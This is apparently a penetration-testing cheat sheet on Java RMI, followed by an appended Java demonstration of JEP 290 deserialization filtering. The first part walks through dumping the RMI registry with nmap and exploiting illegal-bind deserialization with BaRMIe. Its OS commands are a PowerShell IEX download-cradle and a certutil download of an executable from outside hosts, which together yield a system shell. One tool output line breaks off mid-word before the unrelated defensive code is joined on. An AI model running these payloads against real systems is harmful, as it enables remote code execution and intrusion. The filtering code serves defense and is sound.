Java-RMI 1098/1099/1050
Automatic Commands
Protocol_Name: Java-RMI #Protocol Abbreviation if there is one.
Port_Number: 1098 #Comma separated if there is more than one.
Protocol_Description: Java Remote Method Invocation #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for Java-RMI
Note: |
The Java Remote Method Invocation, or Java RMI, is a mechanism that allows an object that exists in one Java virtual machine to access and call methods that are contained in another Java virtual machine. This is basically the same thing as a remote procedure call, but in an object-oriented paradigm instead of a procedural one, which allows for communication between Java programs that are not in the same address space.
nmap -sC -sV -Pn 10.11.1.73 -p 1100
may dump the registry of the Java RMI instance. If this is the case, the machine may be vulnerable to a deserialization exploit.
BaRMIe.jar is the way to go to directly exploit this vulnerability.
https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01 hosts the latest pre-built release.
Usage:
java -jar BaRMIe_v1.01.jar -attack 10.11.1.73 1100
target select) 1
available attacks) 1 (illegal bind deserialization)
payloads) 1 (Apache Common Collections 3.1 worked for me, others may also work)
OS Command) powershell.exe -command "IEX(new-object net.webclient).downloadstring('http://192.168.119.167:80/3232.ps1')"
enjoy your system shell!
https://book.hacktricks.xyz/pentesting/1099-pentesting-java-rmi
Entry_2:
Name: Nmap RMI
Description: Nmap with RMI Scripts
Command: nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1098 {IP}
Entry_3:
Name: Nmap register
Description: Dump register of java-rmi instance
Command: nmap -sC -sV -Pn {IP} -p 1100
BaRMIe
References
Java RMI enumeration and attack tool
Example of execution
Equivalent with nmap
Attack mode
Add the -attack option.
Deserialization payloads for: 10.0.0.1:1100
1) Apache Commons Collections 3.1, 3.2, 3.2.1
2) Apache Commons Collections 4.0-alpha1, 4.0
3) Apache Groovy 1.7-beta-1 to 2.4.0-beta-4
4) Apache Groovy 2.4.0-rc1 to 2.4.3
5) JBoss Interceptors API
6) ROME 0.5 to 1.0
7) ROME 1.5 to 1.7.3
8) Mozilla Rhino 1.7r2
9) Mozilla Rhino 1.7r2 for Java 1.4
10) Mozilla Rhino 1.7r3
11) Mozilla Rhino 1.7r3 for Java 1.4
12) Mozilla Rhino 1.7r4 and 1.7r5
13) Mozilla Rhino 1.7r6, 1.7r7, and 1.7.7.1
a) Try all available deserialization payloads
Select a payload to use (b to back up, q to quit): 1
Enter an OS command to execute: certutil.exe -urlcache -split -f http://10.11.0.75:8000/rewin.exe rewin.exe
[~] Starting RMI registry proxy...
[+] Proxy started
[~] Getting proxied RMI Registry reference...
[~] Calling bind(PAYLOAD, null)...
[~] Attack completed but success could not be verified.
Remediation advice (if attack was successful):
[Java] Update to Java 6u141, Java 7u131, Java 8u121, JRockit R28.3.13 or greater.
[Apache Commons Collections] Update to Apache Commons Collections 3.2.2 or greater.
Attack: Java RMI registry illegal bind deserialization [---]
Java version 6u131, 7u121, 8u121 and below, and JRockit R28.3.12 and below do n
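The remediation advice printed above (Java 8u121 and the related 6u141/7u131 updates) is where JEP 290 deserialization filtering was introduced; the RMI registry in those versions applies a built-in filter to objects it deserializes in bind() and friends, and the same mechanism is available to any application that reads serialized objects. The following is an added example, not part of the page or of BaRMIe, showing how an ObjectInputFilter allow-list stops an unexpected class from being instantiated before any of its code runs. The class names (SerialFilterDemo, SafeMessage, Unexpected) are constructed for the demonstration.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

/**
 * JEP 290 deserialization filter demo (java.io.ObjectInputFilter, Java 9+,
 * backported to 8u121). All class names here are constructed for the example.
 */
public class SerialFilterDemo {

    // The only type the receiving side genuinely expects to read.
    static final class SafeMessage implements Serializable {
        private static final long serialVersionUID = 1L;
        final String text;
        SafeMessage(String text) { this.text = text; }
    }

    // Stands in for any class the receiver never intended to deserialize;
    // it is rejected by name before readObject() can construct it.
    static final class Unexpected implements Serializable {
        private static final long serialVersionUID = 1L;
    }

    // Allow only SafeMessage and String; "!*" rejects every other class.
    // maxdepth caps object-graph nesting, which also limits deeply nested payloads.
    static final ObjectInputFilter ALLOW_LIST = ObjectInputFilter.Config.createFilter(
            "maxdepth=8;SerialFilterDemo$SafeMessage;java.lang.String;!*");

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(buf)) {
            out.writeObject(o);
        }
        return buf.toByteArray();
    }

    // filter == null reproduces the unfiltered behaviour of an unpatched JVM.
    static Object deserialize(byte[] data, ObjectInputFilter filter)
            throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            if (filter != null) {
                in.setObjectInputFilter(filter); // per-stream filter; jdk.serialFilter sets a JVM-wide one
            }
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        byte[] good = serialize(new SafeMessage("hello"));
        byte[] bad = serialize(new Unexpected());

        // Without a filter both streams deserialize: the JVM builds whatever class the bytes name.
        System.out.println("unfiltered: " + deserialize(good, null).getClass().getSimpleName());
        System.out.println("unfiltered: " + deserialize(bad, null).getClass().getSimpleName());

        // With the allow-list the expected type still works ...
        SafeMessage msg = (SafeMessage) deserialize(good, ALLOW_LIST);
        System.out.println("filtered:   " + msg.text);

        // ... and anything else is rejected with InvalidClassException ("filter status: REJECTED").
        try {
            deserialize(bad, ALLOW_LIST);
            System.out.println("filtered:   Unexpected was NOT rejected (filter misconfigured)");
        } catch (InvalidClassException e) {
            System.out.println("filtered:   rejected -> " + e.getMessage());
        }
    }
}
```

Compile and run with `javac SerialFilterDemo.java && java SerialFilterDemo` on Java 9 or later. For an RMI registry specifically, a patched JDK already applies its built-in registry filter, and the `sun.rmi.registry.registryFilter` and `jdk.serialFilter` system properties tighten it further; a registry that nmap can dump is not itself the problem, the JDK version and the classpath (Commons Collections 3.2.2 or greater, per the advice above) are what decide whether the illegal bind attack lands.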